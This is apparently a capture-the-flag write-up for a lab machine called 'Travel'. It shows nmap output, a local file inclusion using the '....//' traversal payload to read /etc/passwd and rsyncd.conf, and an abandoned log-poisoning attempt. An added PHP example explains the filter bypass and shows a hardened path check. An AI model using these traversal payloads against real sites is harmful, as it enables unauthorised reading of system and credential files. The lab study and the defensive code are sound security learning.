# Lab Setup

Download: Travel

NAT networking, IP: 192.168.1.178

# Penetration Process

# Initial Information Gathering

```
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Eline
|_http-server-header: Apache/2.4.56 (Debian)
```

```
┌──(root㉿kali)-[~]
└─# nmap -6 -p- -A fe80::20c:29ff:fe8c:cc8d%eth0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 08:12 EDT
Nmap scan report for fe80::20c:29ff:fe8c:cc8d
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
873/tcp open  rsync   (protocol version 31)
MAC Address: 00:0C:29:8C:CC:8D (VMware)
```

Viewing the page with F12 reveals the path http://192.168.1.178/page.php?i=index.html , and the `i` parameter allows file inclusion: http://192.168.1.178/page.php?i=....//....//....//etc/passwd

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
PL4GU3:x:1000:1000::/home/PL4GU3:/bin/bash
ethicrash2:x:1001:1001::/home/ethicrash2:/bin/bash
xrdp:x:106:113::/run/xrdp:/usr/sbin/nologin
```
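
Why the `....//` sequence gets through, as an added example that is not from the original write-up or the target's code. It assumes page.php removes `../` in a single pass (its source is never shown here), in which case each `....//` collapses back to `../`; `weak_filter`, `safe_resolve` and the temporary demo directory are hypothetical names.

```php
<?php
// Added example: page.php's real source is not shown in the write-up.
// ASSUMPTION: it strips "../" from the parameter in one non-recursive pass.

// Weak filter (assumed behaviour): str_replace never rescans its output,
// so removing the inner "../" of "....//" leaves a fresh "../" behind.
function weak_filter(string $i): string
{
    return str_replace('../', '', $i);
}

// Hardened resolver: allowlist the page name first, then canonicalise the
// path and confirm it is still inside the base directory.
function safe_resolve(string $i, string $base, array $allowed): ?string
{
    if (!in_array($i, $allowed, true)) {
        return null;                        // not a known page name
    }
    $root = realpath($base);
    $real = realpath($base . '/' . $i);     // resolves ".." and symlinks
    if ($root === false || $real === false) {
        return null;                        // missing base or missing file
    }
    // Compare with a trailing separator so a sibling directory such as
    // "<base>-old" cannot satisfy the prefix check.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo: a throwaway directory standing in for the web root.
$base = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($base);
file_put_contents($base . '/index.html', '<h1>Eline</h1>');

$payload = '....//....//....//etc/passwd';  // value taken from the write-up
$allowed = ['index.html'];                  // pages the site is meant to serve

echo 'weak filter output: ', weak_filter($payload), PHP_EOL;
echo 'safe_resolve(payload):    ';
var_dump(safe_resolve($payload, $base, $allowed));
echo 'safe_resolve(index.html): ';
var_dump(safe_resolve('index.html', $base, $allowed));

// Clean up the constructed files.
unlink($base . '/index.html');
rmdir($base);
```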

Request http://192.168.1.178/page.php?i=....//....//....//etc/rsyncd.conf to view the configuration of the rsync service on port 873:

```
motd file = /etc/Rsyncd.motd
lock file = /var/run/Rsync.lock
log file = /var/log/748e62ababa4f1ce54b8970d08ad3eb0.log
pid file = /var/run/Rsyncd.pid
[rsyncserve]
path = /opt/rsyncserve/
comment = Remote file share.
uid = 0
gid = 0
read only = yes
list = no
```

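Next, look at the log: http://192.168.1.178/page.php?i=....//....//..../var/log/748e62ababa4f1ce54b8970d08ad3eb0.log

Connect to rsync once, then check the log again; if the connection shows up in the log, the log can be exploited.

Annoyingly, nothing gets written to the log, so that is the end of it: the target machine is broken.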